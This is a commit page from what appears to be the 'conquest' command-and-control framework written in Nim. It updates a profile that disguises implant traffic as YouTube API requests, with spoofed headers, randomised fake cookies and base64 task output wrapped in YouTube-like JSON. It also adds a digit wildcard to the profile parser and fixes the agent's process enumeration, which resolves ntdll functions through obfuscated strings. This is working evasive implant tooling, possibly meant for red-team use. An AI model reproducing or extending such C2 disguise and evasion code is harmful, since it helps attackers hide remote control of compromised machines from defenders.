admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Updated youtube video profile.

Browse Source
This commit is contained in:
Jakob Friedl
2025-11-10 12:14:00 +01:00
parent df8453bf1a
commit 8a66e56c5a
7 changed files with 29 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
data/profile.toml
View File

@@ -113,6 +113,7 @@ lang = [
"en-US", "en-US",
"de-AT" "de-AT"
] ]
page = "1$"
# Defines how the POST requests made by the agents look like # Defines how the POST requests made by the agents look like
# For modules that involve large file transfers, it is not recommended to place the task output in a header or query parameter, as this will exceed the header size # For modules that involve large file transfers, it is not recommended to place the task output in a header or query parameter, as this will exceed the header size

18
data/youtube.toml
View File

@@ -46,7 +46,6 @@ Sec-Ch-Ua-Model = "''"
Sec-Ch-Ua-Bitness = "''" Sec-Ch-Ua-Bitness = "''"
Sec-Ch-Ua-Wow64 = "?0" Sec-Ch-Ua-Wow64 = "?0"
Accept-Language = [ Accept-Language = [
"en-GB,en;q=0.9",
"en-US,en;q=0.9", "en-US,en;q=0.9",
"de-AT,de;q=0.9,en;q=0.8" "de-AT,de;q=0.9,en;q=0.8"
] ]
@@ -57,7 +56,6 @@ Sec-Fetch-Site = "none"
Sec-Fetch-Mode = "navigate" Sec-Fetch-Mode = "navigate"
Sec-Fetch-User = "?1" Sec-Fetch-User = "?1"
Sec-Fetch-Dest = "document" Sec-Fetch-Dest = "document"
# Accept-Encoding = "gzip, deflate, br" # While this is in the normal request, it breaks the C2 communication, so its commented out
Priority = "u=0, i" Priority = "u=0, i"
# Defines arbitrary headers that are added to the server's response # Defines arbitrary headers that are added to the server's response
@@ -102,9 +100,18 @@ request-methods = "POST"
[http-post.agent.headers] [http-post.agent.headers]
Host = "www.youtube.com" Host = "www.youtube.com"
Referer = "https://www.youtube.com/watch?v=###########" Referer = "https://www.youtube.com/watch?v=###########"
Content-Type = "application/octet-stream" Content-Type = "application/json"
Connection = "Keep-Alive" Connection = "Keep-Alive"
Cache-Control = "no-cache" Cache-Control = "no-cache"
Sec-Ch-Ua = "'Not.A/Brand';v='99', 'Chromium';v='136'"
Sec-Ch-Ua-Mobile = "?0"
Sec-Ch-Ua-Full-Version = "''"
Sec-Ch-Ua-Arch = "''"
Sec-Ch-Ua-Platform = "'Windows'"
Sec-Ch-Ua-Platform-Version = "''"
Sec-Ch-Ua-Model = "''"
Sec-Ch-Ua-Bitness = "''"
Sec-Ch-Ua-Wow64 = "?0"
Cookie = "YSC=###########; SOCS=##############################################; VISITOR_PRIVACY_METADATA=##################################################################; __Secure-1PSIDTS=sidts-#######_##########################################_#########################; __Secure-3PSIDTS=sidts-#######_##########################################_#########################; HSID=####################;" Cookie = "YSC=###########; SOCS=##############################################; VISITOR_PRIVACY_METADATA=##################################################################; __Secure-1PSIDTS=sidts-#######_##########################################_#########################; __Secure-3PSIDTS=sidts-#######_##########################################_#########################; HSID=####################;"
[http-post.agent.parameters] [http-post.agent.parameters]
@@ -115,6 +122,9 @@ pretty-print = [
[http-post.agent.output] [http-post.agent.output]
placement = { type = "body" } placement = { type = "body" }
encoding = { type = "base64", url-safe = true }
prefix = "{'context':{'client':{'hl':'de','gl':'AT','remoteHost':'$$.1$$.$$.1$$','deviceMake':'','deviceModel':'','visitorData':'Cgt1M016MzRrZmhTUSj12MbIBjInCgJBVBIhEh0SGwsMDg8QERITFBUWFxgZGhscHR4fICEiIyQlJiBe','userAgent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36,gzip(gfe)','clientName':'WEB','clientVersion':'2.20251107.01.00','osName':'Windows','osVersion':'10.0','originalUrl':'https://www.youtube.com/','screenPixelDensity':2,'platform':'DESKTOP','clientFormFactor':'UNKNOWN_FORM_FACTOR','configInfo':{'appInstallData':'"
suffix = "'},'screenDensityFloat':1.5,'userInterfaceTheme':'USER_INTERFACE_THEME_DARK','timeZone':'Europe/Vienna','browserName':'Chrome','browserVersion':'142.0.0.0','acceptHeader':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7','deviceExperimentId':'ChxOelUzTVRBeU1qQTJPVEV4TkRFNU5qUXhOQT09EPXYxsgGGPXYxsgG','rolloutToken':'CJu4u9qz64jjcxCr8dad-t-QAxjzyIbunueQAw%3D%3D','screenWidthPoints':1920,'screenHeightPoints':1065,'utcOffsetMinutes':60,'connectionType':'CONN_CELLULAR_3G','memoryTotalKbytes':'8000000','mainAppWebInfo':{'graftUrl':'https://www.youtube.com/watch?v=###########&list=RD4WIMyqBG9gs&start_radio=1','pwaInstallabilityStatus':'PWA_INSTALLABILITY_STATUS_UNKNOWN','webDisplayMode':'WEB_DISPLAY_MODE_BROWSER','isWebNativeShareAvailable':true}},'user':{'lockedSafetyMode':false},'request':{'useSsl':true,'internalExperimentFlags':[],'consistencyTokenJars':[]},'clickTracking':{'clickTrackingParams':'CJgFEKVBIhMIucGi957nkAMVneRJBx3cFhscygEErMFOaw=='},'adSignalsInfo':{'params':[{'key':'dt','value':'1762765953510'},{'key':'flash','value':'0'},{'key':'frm','value':'0'},{'key':'u_tz','value':'60'},{'key':'u_his','value':'4'},{'key':'u_h','value':'1200'},{'key':'u_w','value':'1920'},{'key':'u_ah','value':'1152'},{'key':'u_aw','value':'1920'},{'key':'u_cd','value':'24'},{'key':'bc','value':'31'},{'key':'bih','value':'1065'},{'key':'biw','value':'1905'},{'key':'brdim','value':'0,0,0,0,1920,0,1920,1152,1920,1065'},{'key':'vis','value':'1'},{'key':'wgl','value':'true'},{'key':'ca_type','value':'image'}],'bid':'ANyPxKqp2RGW0TLEXMjNbBRm6ZPDYteE8iHnYK0DaJMOiTEHrbqefZtn6qfK_MhA2-ZgnoosEwKaN8pi77jJRptRzz5Rsm-P_w'}},'target':{'videoId':'###########'},'params':'Cg0KCzRXSU15cUJHOWdzIAAyDAiJ2cbIBhCm6ueLAQ%3D%3D'}"
[http-post.server.headers] [http-post.server.headers]
Content-Type = "application/json; charset=utf-8" Content-Type = "application/json; charset=utf-8"
@@ -128,4 +138,4 @@ Strict-Transport-Security = "max-age=31536000"
Alt-Svc = "h3=':443'; ma=2592000,h3-29=':443'; ma=2592000" Alt-Svc = "h3=':443'; ma=2592000,h3-29=':443'; ma=2592000"
[http-post.server.output] [http-post.server.output]
body = "" body = "{'responseContext': {}}"

2
docs/3-PROFILE.md
View File

@@ -12,7 +12,7 @@
## General ## General
Conquest supports malleable C2 profiles written using the TOML configuration language. This allows the complete customization of network traffic using data transformation, encoding and randomization. Wildcard characters `#` are replaced by a random alphanumerical character, making it possible to add even more variation to requests via randomized parameters or cookies. Conquest supports malleable C2 profiles written using the TOML configuration language. This allows the complete customization of network traffic using data transformation, encoding and randomization. Wildcard characters `#` are replaced by a random alphanumerical character, making it possible to add even more variation to requests via randomized parameters or cookies. There is also the `$` wildcard, which is replaced by a single digit, for randomizing numeric values.
General settings that are defined at the beginning of the profile are the profile name and the relative location of important files, such as the team server's private key or the Conquest database. General settings that are defined at the beginning of the profile are the profile name and the relative location of important files, such as the team server's private key or the Conquest database.

11
src/agent/core/process.nim
View File

@@ -54,7 +54,7 @@ proc processList*(): Table[DWORD, ProcessInfo] =
# Take a snapshot of running processes # Take a snapshot of running processes
var sysProcessInfo = processSnapshot() var sysProcessInfo = processSnapshot()
defer: LocalFree(cast[HLOCAL](sysProcessInfo)) defer: LocalFree(cast[HLOCAL](sysProcessInfo))
let pNtOpenProcess = cast[NtOpenProcess](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcess"))) let pNtOpenProcess = cast[NtOpenProcess](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcess")))
let pNtOpenProcessToken = cast[NtOpenProcessToken](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcessToken"))) let pNtOpenProcessToken = cast[NtOpenProcessToken](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtOpenProcessToken")))
let pNtClose = cast[NtClose](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtClose"))) let pNtClose = cast[NtClose](GetProcAddress(GetModuleHandleA(protect("ntdll")), protect("NtClose")))
@@ -62,8 +62,8 @@ proc processList*(): Table[DWORD, ProcessInfo] =
while true: while true:
var var
status: NTSTATUS status: NTSTATUS
hToken: HANDLE hToken: HANDLE = 0
hProcess: HANDLE hProcess: HANDLE = 0
oa: OBJECT_ATTRIBUTES oa: OBJECT_ATTRIBUTES
clientId: CLIENT_ID clientId: CLIENT_ID
@@ -90,9 +90,10 @@ proc processList*(): Table[DWORD, ProcessInfo] =
status = pNtOpenProcessToken(hProcess, TOKEN_QUERY, addr hToken) status = pNtOpenProcessToken(hProcess, TOKEN_QUERY, addr hToken)
if status == STATUS_SUCCESS and hToken != 0: if status == STATUS_SUCCESS and hToken != 0:
result[pid].user = hToken.getTokenUser().username result[pid].user = hToken.getTokenUser().username
defer: discard pNtClose(hToken)
else:
result[pid].user = ""
discard pNtClose(hProcess) discard pNtClose(hProcess)
discard pNtClose(hToken)
# Move to next process # Move to next process
if sysProcessInfo.NextEntryOffset == 0: if sysProcessInfo.NextEntryOffset == 0:

2
src/agent/nim.cfg
View File

File diff suppressed because one or more lines are too long

6
src/common/profile.nim
View File

@@ -24,6 +24,10 @@ proc randomChar(): char =
let alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" let alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
return alphabet[rand(alphabet.len - 1)] return alphabet[rand(alphabet.len - 1)]
proc randomNumber(): char =
let numbers = "0123456789"
return numbers[rand(numbers.len - 1)]
proc getRandom*(values: seq[TomlValueRef]): TomlValueRef = proc getRandom*(values: seq[TomlValueRef]): TomlValueRef =
if values.len == 0: if values.len == 0:
return nil return nil
@@ -39,7 +43,7 @@ proc getStringValue*(key: TomlValueRef, default: string = ""): string =
value = key.getElems().getRandom().getStr(default) value = key.getElems().getRandom().getStr(default)
# Replace '#' with a random alphanumerical character and return the resulting string # Replace '#' with a random alphanumerical character and return the resulting string
return value.mapIt(if it == '#': randomChar() else: it).join("") return value.mapIt(if it == '#': randomChar() elif it == '$': randomNumber() else: it).join("")
proc getString*(profile: Profile, path: string, default: string = ""): string = proc getString*(profile: Profile, path: string, default: string = ""): string =
let key = profile.findKey(path) let key = profile.findKey(path)

2
src/modules/systeminfo.nim
View File

@@ -49,7 +49,7 @@ when defined(agent):
try: try:
var processes: seq[DWORD] = @[] var processes: seq[DWORD] = @[]
var output: string = "" var output: string = ""
var procMap = processList() var procMap = processList()
# Create child-parent process relationships # Create child-parent process relationships